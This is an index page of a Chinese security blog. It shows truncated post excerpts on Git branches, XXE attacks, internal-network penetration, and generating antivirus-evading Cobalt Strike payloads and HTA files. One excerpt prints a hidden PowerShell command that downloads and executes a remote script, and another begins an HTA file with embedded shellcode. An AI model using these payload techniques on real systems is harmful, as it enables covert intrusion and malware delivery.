Git分支(branch)操作命令

RedFree | Git | 2016-10-25
Git分支(branch)操作命令
1、查看远程分支$ git branch -a   * br-2.1.2.2     master     remotes/origin/HEAD -> origin/master     remotes/origin/br-2.1.2.1     remotes/origin/br-2.1.2.2     remotes/origin/b... [阅读全文]
ė30 次访问 6没有评论 0,

未知攻焉知防——XXE漏洞攻防[转载]

RedFree | XXE | 2016-10-23
未知攻焉知防——XXE漏洞攻防[转载]
一、XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。内部声明DTD<!DOCTY... [阅读全文]
ė297 次访问 6没有评论 0,

内网渗透学习简明教程[转载]

RedFree | Linux, Python, Windows | 2016-10-22
内网渗透学习简明教程[转载]
https://github.com/l3m0n/pentest_study域环境搭建准备: DC: win2008 DM: win2003 DM: winxpwin2008(域控) 1、修改计算机名: 2、配置固定ip: 其中网关设置错误,应该为192.168.206.2,开始默认的网管 3、服务器管理器---角色: 4、配置域服务: dos下面输入dcpromo Ps:这里可能会因为本地administrator的密码规则不合要求,导致... [阅读全文]

使用VB生成CobaltStrike Beacon类型的免杀Payload

RedFree | CobaltStrike, JAVA, Metasploit, VB | 2016-10-19
使用VB生成CobaltStrike Beacon类型的免杀Payload
CobaltStrike已提供了生成Microsoft office宏的功能,直接使用此功能生成对应载荷的宏代码,新建vb工程粘贴宏代码并去掉不相关注释即可。vb6.0代码如下:Private Type PROCESS_INFORMATION     hProcess As Long     hThread As Long     dwProcessId&n... [阅读全文]
ė83 次访问 6没有评论 0, , ,

CobaltStrike 3.x生成HTML应用程序(.hta)的三种类型

RedFree | CobaltStrike, JAVA, Metasploit, VB, Windows | 2016-10-19
CobaltStrike 3.x生成HTML应用程序(.hta)的三种类型
1、Executableevil.hta代码:<script language="VBScript">     Function var_func()         var_shellcode = "4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000000000000000000000000000000000... [阅读全文]

CobaltStrike 3.x远程调用脚本获取会话的4种模式

RedFree | CobaltStrike, JAVA, Metasploit, Python, Windows | 2016-10-19
CobaltStrike 3.x远程调用脚本获取会话的4种模式
在CobaltStrike 3.x中有4种远程调用脚本执行载荷的方法:1、Powershell远程调用命令:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.118/rev'))"远程脚本内容:$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("... [阅读全文]

CobaltStrike 2.5无法交互执行cmd命令修复

RedFree | CobaltStrike, JAVA, Metasploit | 2016-10-18
CobaltStrike 2.5无法交互执行cmd命令修复
Metasploit 4.11.4版本之后msgpack进行了一次升级,导致CobaltStrike2.4和之前的版本都不能正常使用了。CobaltStrike 2.5对msgpack也进行了升级,但从此之后不能正常交互执行cmd命令了。报错信息如下: [-] Meterpreter 1 error while executing 'read 1': java.nio.charset.MalformedInputExcep... [阅读全文]
ė62 次访问 6没有评论 0, ,
Ɣ回顶部